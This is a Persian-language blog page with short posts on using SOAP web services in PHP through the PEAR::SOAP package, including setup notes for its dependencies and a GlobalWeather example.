با اين همه آنان با سخت كوشي و همت خود بر تمامي اين خطرات فايق آمده و راه هاي مناسبي براي حل مشكلات خود يافته اند كه همين امر، مايه شهرت و آوازه اين شهر شده است.

ادامه توضیحات برای علاقه مندان در ادامه مطلب قرار گرفته است ...

ادامه مطلب ...

مطالعه موردی یک وب سرويس SOAP

نویسنده: سینا - دوشنبه دوم فروردین 1389

امروز میخوام کمی در مورد Web Service ها و نحوه بکارگیری این خدمات توسط PHP صحبت کنم.مقدمهکسانی که تازه، وارد ِ وادی برنامه نویسی و اسکریپت نویسی میشن، همواره XML رو دیو دو شاخی می بینن که اصلا نمیشه حریفش شد و فکر می کنند این مفهوم خارج از کهکشان سایبر اومده و مثل shocked

نیگاش میکنند!

در این پست که خیلی هم طولانی خواهد شد، میخوایم این دیو دو شاخ رو به زانو در بیاریم، البته به کمک PEAR و یه ذره سلیقه!

چون طولانی شد در ادامه مطلب مطالعه فرمایید ...

ادامه مطلب ...

نمونه عملی وب سرويس GlobalWeather

نویسنده: سینا - دوشنبه دوم فروردین 1389

PEAR پريروز، در مورد استفاده از يک وب سرويس SOAP با کمک پکيج PEAR::SOAP مطلبی نوشتم، ديروز تصميم گرفتم که نمونه عملی اون رو هم روی سايت بگذارم تا نحوه کارکردش رو ببينيد. الان اکثر هوستينگها پکيج های استاندارد PEAR نظير PEAR::DB که يک Database Abstraction برای نوشتن اسکريپتهايی Portable برای بانک های اطلاعاتی مختلفه رو بصورت پيش فرض روی سيستم نصب میکنند. ولی مسلما گستردگی اين پکيج ها زياده و بجز چند پکيج استاندارد بقيه رو شما بايد بصورت Manual نصب کنيد. برای دريافت پکيج PEAR::SOAP تشريف می بريداينجا. ویرایش آخر اين پكيج یعنی 0.8RC3، نياز به نسخه ۴.۱ به بالای PHP و نصب بودن اکستنشن PCRE (عبارات باقاعده سازگار با Perl) و نصب ۴ پکيج ديگه داره که معمولا Mail_Mime روی سرويس دهنده نصب هست و شما بايد زحمت سه تای ديگه رو بکشيد. پکيج HTTP_Request وابسته به پکيج Net_URL هست و بدون اون کار نمیکنه. بعد از دریافت این پکیج ها همشون رو کلا با دایرکتوری مربوطه روی سرویس دهنده منتقل میکنید و در یک پوشه قرار میدید، میتونید یه فایل htaccess. در روت اون دایرکتوری ایجاد کنید و این دایرکتوری رو به اینکلودهای php.ini اضافه کنید تا همیشه هر جا میخواستید از کتابخانه های PEAR استفاده کنید تا مجبور نباشید کل پکیج ها رو، تو روت صفحه اصلی بریزید تا اینکلود بشه!(در غیر اینصورت مجبورید تمام اینکلودها رو با آدرس نسبی تغییر بدید.)من یک ساب دومین ساختم به نام ws که هر چی وب سرویس هست رو به مرور اینجا قرار میدم و شما می تونید نمونه عملی برخی از اونها رو ببینید.

خارج از محدوده: اگه کسی سوالی تو کامنتها بپرسه، من اگه بلد باشم همونجا جوابشو ميدم. wink